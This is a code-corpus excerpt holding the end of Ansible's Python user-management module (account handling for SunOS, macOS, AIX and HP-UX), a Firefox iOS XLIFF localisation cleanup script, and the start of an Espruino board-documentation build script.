cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups = set(current_groups).union(groups)
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
if self.password_lock and not info[1].startswith('*LOCKED*'):
cmd.append('-C yes')
elif self.password_lock is False and info[1].startswith('*LOCKED*'):
cmd.append('-C no')
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
class SunOS(User):
"""
This is a SunOS User manipulation class - The main difference between
this class and the generic user class is that Solaris-type distros
don't support the concept of a "system" account and we need to
edit the /etc/shadow file manually to set a password. (Ugh)
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
- user_info()
"""
platform = 'SunOS'
distribution = None
SHADOWFILE = '/etc/shadow'
USER_ATTR = '/etc/user_attr'
def get_password_defaults(self):
# Read password aging defaults
try:
minweeks = ''
maxweeks = ''
warnweeks = ''
with open("/etc/default/passwd", 'r') as f:
for line in f:
line = line.strip()
if (line.startswith('#') or line == ''):
continue
m = re.match(r'^([^#]*)#(.*)$', line)
if m: # The line contains a hash / comment
line = m.group(1)
key, value = line.split('=')
if key == "MINWEEKS":
minweeks = value.rstrip('\n')
elif key == "MAXWEEKS":
maxweeks = value.rstrip('\n')
elif key == "WARNWEEKS":
warnweeks = value.rstrip('\n')
except Exception as err:
self.module.fail_json(msg="failed to read /etc/default/passwd: %s" % to_native(err))
return (minweeks, maxweeks, warnweeks)
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.profile is not None:
cmd.append('-P')
cmd.append(self.profile)
if self.authorization is not None:
cmd.append('-A')
cmd.append(self.authorization)
if self.role is not None:
cmd.append('-R')
cmd.append(self.role)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
if not self.module.check_mode:
# we have to set the password by editing the /etc/shadow file
if self.password is not None:
self.backup_shadow()
minweeks, maxweeks, warnweeks = self.get_password_defaults()
try:
lines = []
with open(self.SHADOWFILE, 'rb') as f:
for line in f:
line = to_native(line, errors='surrogate_or_strict')
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() // 86400))
if minweeks:
try:
fields[3] = str(int(minweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
if maxweeks:
try:
fields[4] = str(int(maxweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
if warnweeks:
try:
fields[5] = str(int(warnweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
line = ':'.join(fields)
lines.append('%s\n' % line)
with open(self.SHADOWFILE, 'w+') as f:
f.writelines(lines)
except Exception as err:
self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups.update(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.profile is not None and info[7] != self.profile:
cmd.append('-P')
cmd.append(self.profile)
if self.authorization is not None and info[8] != self.authorization:
cmd.append('-A')
cmd.append(self.authorization)
if self.role is not None and info[9] != self.role:
cmd.append('-R')
cmd.append(self.role)
# modify the user if cmd will do anything
if cmd_len != len(cmd):
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password by editing the /etc/shadow file
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
self.backup_shadow()
(rc, out, err) = (0, '', '')
if not self.module.check_mode:
minweeks, maxweeks, warnweeks = self.get_password_defaults()
try:
lines = []
with open(self.SHADOWFILE, 'rb') as f:
for line in f:
line = to_native(line, errors='surrogate_or_strict')
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() // 86400))
if minweeks:
fields[3] = str(int(minweeks) * 7)
if maxweeks:
fields[4] = str(int(maxweeks) * 7)
if warnweeks:
fields[5] = str(int(warnweeks) * 7)
line = ':'.join(fields)
lines.append('%s\n' % line)
with open(self.SHADOWFILE, 'w+') as f:
f.writelines(lines)
rc = 0
except Exception as err:
self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
return (rc, out, err)
def user_info(self):
info = super(SunOS, self).user_info()
if info:
info += self._user_attr_info()
return info
def _user_attr_info(self):
info = [''] * 3
with open(self.USER_ATTR, 'r') as file_handler:
for line in file_handler:
lines = line.strip().split('::::')
if lines[0] == self.name:
tmp = dict(x.split('=') for x in lines[1].split(';'))
info[0] = tmp.get('profiles', '')
info[1] = tmp.get('auths', '')
info[2] = tmp.get('roles', '')
return info
class DarwinUser(User):
"""
This is a Darwin macOS User manipulation class.
Main differences are that Darwin:-
- Handles accounts in a database managed by dscl(1)
- Has no useradd/groupadd
- Does not create home directories
- User password must be cleartext
- UID must be given
- System users must ben under 500
This overrides the following methods from the generic class:-
- user_exists()
- create_user()
- remove_user()
- modify_user()
"""
platform = 'Darwin'
distribution = None
SHADOWFILE = None
dscl_directory = '.'
fields = [
('comment', 'RealName'),
('home', 'NFSHomeDirectory'),
('shell', 'UserShell'),
('uid', 'UniqueID'),
('group', 'PrimaryGroupID'),
('hidden', 'IsHidden'),
]
def __init__(self, module):
super(DarwinUser, self).__init__(module)
# make the user hidden if option is set or deffer to system option
if self.hidden is None:
if self.system:
self.hidden = 1
elif self.hidden:
self.hidden = 1
else:
self.hidden = 0
# add hidden to processing if set
if self.hidden is not None:
self.fields.append(('hidden', 'IsHidden'))
def _get_dscl(self):
return [self.module.get_bin_path('dscl', True), self.dscl_directory]
def _list_user_groups(self):
cmd = self._get_dscl()
cmd += ['-search', '/Groups', 'GroupMembership', self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
groups = []
for line in out.splitlines():
if line.startswith(' ') or line.startswith(')'):
continue
groups.append(line.split()[0])
return groups
def _get_user_property(self, property):
'''Return user PROPERTY as given my dscl(1) read or None if not found.'''
cmd = self._get_dscl()
cmd += ['-read', '/Users/%s' % self.name, property]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
return None
# from dscl(1)
# if property contains embedded spaces, the list will instead be
# displayed one entry per line, starting on the line after the key.
lines = out.splitlines()
# sys.stderr.write('*** |%s| %s -> %s\n' % (property, out, lines))
if len(lines) == 1:
return lines[0].split(': ')[1]
else:
if len(lines) > 2:
return '\n'.join([lines[1].strip()] + lines[2:])
else:
if len(lines) == 2:
return lines[1].strip()
else:
return None
def _get_next_uid(self, system=None):
'''
Return the next available uid. If system=True, then
uid should be below of 500, if possible.
'''
cmd = self._get_dscl()
cmd += ['-list', '/Users', 'UniqueID']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
self.module.fail_json(
msg="Unable to get the next available uid",
rc=rc,
out=out,
err=err
)
max_uid = 0
max_system_uid = 0
for line in out.splitlines():
current_uid = int(line.split(' ')[-1])
if max_uid < current_uid:
max_uid = current_uid
if max_system_uid < current_uid and current_uid < 500:
max_system_uid = current_uid
if system and (0 < max_system_uid < 499):
return max_system_uid + 1
return max_uid + 1
def _change_user_password(self):
'''Change password for SELF.NAME against SELF.PASSWORD.
Please note that password must be cleartext.
'''
# some documentation on how is stored passwords on OSX:
# http://blog.lostpassword.com/2012/07/cracking-mac-os-x-lion-accounts-passwords/
# http://null-byte.wonderhowto.com/how-to/hack-mac-os-x-lion-passwords-0130036/
# http://pastebin.com/RYqxi7Ca
# on OSX 10.8+ hash is SALTED-SHA512-PBKDF2
# https://pythonhosted.org/passlib/lib/passlib.hash.pbkdf2_digest.html
# https://gist.github.com/nueh/8252572
cmd = self._get_dscl()
if self.password:
cmd += ['-passwd', '/Users/%s' % self.name, self.password]
else:
cmd += ['-create', '/Users/%s' % self.name, 'Password', '*']
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Error when changing password', err=err, out=out, rc=rc)
return (rc, out, err)
def _make_group_numerical(self):
'''Convert SELF.GROUP to is stringed numerical value suitable for dscl.'''
if self.group is None:
self.group = 'nogroup'
try:
self.group = grp.getgrnam(self.group).gr_gid
except KeyError:
self.module.fail_json(msg='Group "%s" not found. Try to create it first using "group" module.' % self.group)
# We need to pass a string to dscl
self.group = str(self.group)
def __modify_group(self, group, action):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
if action == 'add':
option = '-a'
else:
option = '-d'
cmd = ['dseditgroup', '-o', 'edit', option, self.name, '-t', 'user', group]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot %s user "%s" to group "%s".'
% (action, self.name, group), err=err, out=out, rc=rc)
return (rc, out, err)
def _modify_group(self):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
rc = 0
out = ''
err = ''
changed = False
current = set(self._list_user_groups())
if self.groups is not None:
target = set(self.groups.split(','))
else:
target = set([])
if self.append is False:
for remove in current - target:
(_rc, _err, _out) = self.__modify_group(remove, 'delete')
rc += rc
out += _out
err += _err
changed = True
for add in target - current:
(_rc, _err, _out) = self.__modify_group(add, 'add')
rc += _rc
out += _out
err += _err
changed = True
return (rc, err, out, changed)
def _update_system_user(self):
'''Hide or show user on login window according SELF.SYSTEM.
Returns 0 if a change has been made, None otherwise.'''
plist_file = '/Library/Preferences/com.apple.loginwindow.plist'
# http://support.apple.com/kb/HT5017?viewlocale=en_US
cmd = ['defaults', 'read', plist_file, 'HiddenUsersList']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
# returned value is
# (
# "_userA",
# "_UserB",
# userc
# )
hidden_users = []
for x in out.splitlines()[1:-1]:
try:
x = x.split('"')[1]
except IndexError:
x = x.strip()
hidden_users.append(x)
if self.system:
if self.name not in hidden_users:
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array-add', self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot user "%s" to hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
else:
if self.name in hidden_users:
del (hidden_users[hidden_users.index(self.name)])
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array'] + hidden_users
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot remove user "%s" from hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
def user_exists(self):
'''Check is SELF.NAME is a known user on the system.'''
cmd = self._get_dscl()
cmd += ['-list', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
return rc == 0
def remove_user(self):
'''Delete SELF.NAME. If SELF.FORCE is true, remove its home directory.'''
info = self.user_info()
cmd = self._get_dscl()
cmd += ['-delete', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot delete user "%s".' % self.name, err=err, out=out, rc=rc)
if self.force:
if os.path.exists(info[5]):
shutil.rmtree(info[5])
out += "Removed %s" % info[5]
return (rc, out, err)
def create_user(self, command_name='dscl'):
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name]
(rc, err, out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot create user "%s".' % self.name, err=err, out=out, rc=rc)
self._make_group_numerical()
if self.uid is None:
self.uid = str(self._get_next_uid(self.system))
# Homedir is not created by default
if self.create_home:
if self.home is None:
self.home = '/Users/%s' % self.name
if not self.module.check_mode:
if not os.path.exists(self.home):
os.makedirs(self.home)
self.chown_homedir(int(self.uid), int(self.group), self.home)
# dscl sets shell to /usr/bin/false when UserShell is not specified
# so set the shell to /bin/bash when the user is not a system user
if not self.system and self.shell is None:
self.shell = '/bin/bash'
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot add property "%s" to user "%s".' % (field[0], self.name), err=err, out=out, rc=rc)
out += _out
err += _err
if rc != 0:
return (rc, _err, _out)
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
self._update_system_user()
# here we don't care about change status since it is a creation,
# thus changed is always true.
if self.groups:
(rc, _out, _err, changed) = self._modify_group()
out += _out
err += _err
return (rc, err, out)
def modify_user(self):
changed = None
out = ''
err = ''
if self.group:
self._make_group_numerical()
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
current = self._get_user_property(field[1])
if current is None or current != self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot update property "%s" for user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
changed = rc
out += _out
err += _err
if self.update_password == 'always' and self.password is not None:
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
changed = rc
if self.groups:
(rc, _out, _err, _changed) = self._modify_group()
out += _out
err += _err
if _changed is True:
changed = rc
rc = self._update_system_user()
if rc == 0:
changed = rc
return (changed, out, err)
class AIX(User):
"""
This is a AIX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'AIX'
distribution = None
SHADOWFILE = '/etc/security/passwd'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.password is not None:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
# skip if no changes to be made
if len(cmd) == 1:
(rc, out, err) = (None, '', '')
else:
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
(rc2, out2, err2) = self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
else:
(rc2, out2, err2) = (None, '', '')
if rc is not None:
return (rc, out + out2, err + err2)
else:
return (rc2, out + out2, err + err2)
class HPUX(User):
"""
This is a HP-UX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'HP-UX'
distribution = None
SHADOWFILE = '/etc/shadow'
def create_user(self):
cmd = ['/usr/sam/lbin/useradd.sam']
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user(self):
cmd = ['/usr/sam/lbin/userdel.sam']
if self.force:
cmd.append('-F')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = ['/usr/sam/lbin/usermod.sam']
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-F')
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def main():
ssh_defaults = dict(
bits=0,
type='rsa',
passphrase=None,
comment='ansible-generated on %s' % socket.gethostname()
)
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default='present', choices=['absent', 'present']),
name=dict(type='str', required=True, aliases=['user']),
uid=dict(type='int'),
non_unique=dict(type='bool', default=False),
group=dict(type='str'),
groups=dict(type='list'),
comment=dict(type='str'),
home=dict(type='path'),
shell=dict(type='str'),
password=dict(type='str', no_log=True),
login_class=dict(type='str'),
# following options are specific to macOS
hidden=dict(type='bool'),
# following options are specific to selinux
seuser=dict(type='str'),
# following options are specific to userdel
force=dict(type='bool', default=False),
remove=dict(type='bool', default=False),
# following options are specific to useradd
create_home=dict(type='bool', default=True, aliases=['createhome']),
skeleton=dict(type='str'),
system=dict(type='bool', default=False),
# following options are specific to usermod
move_home=dict(type='bool', default=False),
append=dict(type='bool', default=False),
# following are specific to ssh key generation
generate_ssh_key=dict(type='bool'),
ssh_key_bits=dict(type='int', default=ssh_defaults['bits']),
ssh_key_type=dict(type='str', default=ssh_defaults['type']),
ssh_key_file=dict(type='path'),
ssh_key_comment=dict(type='str', default=ssh_defaults['comment']),
ssh_key_passphrase=dict(type='str', no_log=True),
update_password=dict(type='str', default='always', choices=['always', 'on_create']),
expires=dict(type='float'),
password_lock=dict(type='bool'),
local=dict(type='bool'),
profile=dict(type='str'),
authorization=dict(type='str'),
role=dict(type='str'),
),
supports_check_mode=True
)
user = User(module)
user.check_password_encrypted()
module.debug('User instantiated - platform %s' % user.platform)
if user.distribution:
module.debug('User instantiated - distribution %s' % user.distribution)
rc = None
out = ''
err = ''
result = {}
result['name'] = user.name
result['state'] = user.state
if user.state == 'absent':
if user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.remove_user()
if rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
result['force'] = user.force
result['remove'] = user.remove
elif user.state == 'present':
if not user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.create_user()
if module.check_mode:
result['system'] = user.name
else:
result['system'] = user.system
result['create_home'] = user.create_home
else:
# modify user (note: this function is check mode aware)
(rc, out, err) = user.modify_user()
result['append'] = user.append
result['move_home'] = user.move_home
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if user.password is not None:
result['password'] = 'NOT_LOGGING_PASSWORD'
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
if user.user_exists() and user.state == 'present':
info = user.user_info()
if info is False:
result['msg'] = "failed to look up user name: %s" % user.name
result['failed'] = True
result['uid'] = info[2]
result['group'] = info[3]
result['comment'] = info[4]
result['home'] = info[5]
result['shell'] = info[6]
if user.groups is not None:
result['groups'] = user.groups
# handle missing homedirs
info = user.user_info()
if user.home is None:
user.home = info[5]
if not os.path.exists(user.home) and user.create_home:
if not module.check_mode:
user.create_homedir(user.home)
user.chown_homedir(info[2], info[3], user.home)
result['changed'] = True
# deal with ssh key
if user.sshkeygen:
# generate ssh key (note: this function is check mode aware)
(rc, out, err) = user.ssh_key_gen()
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if rc == 0:
result['changed'] = True
(rc, out, err) = user.ssh_key_fingerprint()
if rc == 0:
result['ssh_fingerprint'] = out.strip()
else:
result['ssh_fingerprint'] = err.strip()
result['ssh_key_file'] = user.get_ssh_key_path()
result['ssh_public_key'] = user.get_ssh_public_key()
module.exit_json(**result)
# import module snippets
if __name__ == '__main__':
main()
| EvanK/ansible | lib/ansible/modules/system/user.py | Python | gpl-3.0 | 97,224 |
#!/usr/bin/env python
#
# xliff-cleanup.py <files>
#
# 1. Remove all <file> sections that we do not care about. We only care about the
# the one for our main app and those for our extensions.
#
# 2. Look at all remaining <file> sections and remove those strings that should not
# be localized. Currently that means: CFBundleDisplayName, CFBundleName and
# CFBundleShortVersionString.
#
# 3. Remove all remaining <file> sections that are now have no <trans-unit> nodes
# in their <body> anymore.
#
# Modifies files in place. Makes no backup.
#
import sys
from lxml import etree
NS = {'x':'urn:oasis:names:tc:xliff:document:1.2'}
FILES_TO_KEEP = ('Client/Info.plist',
'Extensions/ShareTo/Info.plist',
'Extensions/SendTo/Info.plist',
'Extensions/Today/Info.plist',
'Extensions/ViewLater/Info.plist')
STRINGS_TO_REMOVE = ('CFBundleDisplayName',
'CFBundleName',
'CFBundleShortVersionString')
if __name__ == "__main__":
for path in sys.argv[1:]:
# Read it in and modify it in memory
with open(path) as fp:
tree = etree.parse(fp)
root = tree.getroot()
# 1. Remove sections we do not care about
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
if file_node.get('original') not in FILES_TO_KEEP:
file_node.getparent().remove(file_node)
# 2. Remove strings we don't want to be translated
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
for trans_unit_node in file_node.xpath("./x:body/x:trans-unit", namespaces=NS):
id = trans_unit_node.get('id')
# TODO we should probably do the exception for SendTo in a nicer way with some kind of whitelist
if id and id in STRINGS_TO_REMOVE and not ((original == "Extensions/SendTo/Info.plist" and id == "CFBundleDisplayName") or (original == "Extensions/ViewLater/Info.plist" and id == "CFBundleDisplayName")):
trans_unit_node.getparent().remove(trans_unit_node)
# 3. Remove empty file sections
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
trans_unit_nodes = file_node.xpath("x:body/x:trans-unit", namespaces=NS)
if len(trans_unit_nodes) == 0:
file_node.getparent().remove(file_node)
# Write it back to the same file
with open(path, "w") as fp:
fp.write(etree.tostring(tree))
| doronkatz/firefox-ios | scripts/xliff-cleanup.py | Python | mpl-2.0 | 2,992 |
#!/usr/bin/python
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 Gordon Williams <[email protected]>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# Builds HTML documentation from the files in the boards directory
# ----------------------------------------------------------------------------------------
import subprocess;
import re;
import json;
import sys;
import os;
import importlib;
scriptdir = os.path.dirname(os.path.realpath(__file__))
basedir = scriptdir+"/../"
sys.path.append(basedir+"scripts");
sys.path.append(basedir+"boards");
import pinutils;
# -----------------------------------------------------------------------------------------
# Now scan AF file
print "Script location "+scriptdir
embeddable = False
boardname = ""
if len(sys.argv)==3 and sys.argv[2]=="pinout":
embeddable = True
boardname = sys.argv[1]
if len(sys.argv)==2:
boardname = sys.argv[1]
if boardname=="":
print "ERROR..."
print "USAGE: build_board_docs.py BOARD_NAME [pinout]"
print " 'pinout' will output embeddable HTML of just the pinout"
exit(1)
print "BOARD "+boardname
#htmlFilename = sys.argv[2]
htmlFilename = "boards/"+boardname+".html"
print "HTML_FILENAME "+htmlFilename
htmlFile = open(htmlFilename, 'w')
def writeHTML(s): htmlFile.write(s+"\n");
# import the board def
board = importlib.import_module(boardname)
# Call the included board_specific file - it sets up 'pins' and 'fill_gaps'
pins = board.get_pins()
pins = pinutils.append_devices_to_pin_list(pins, board)
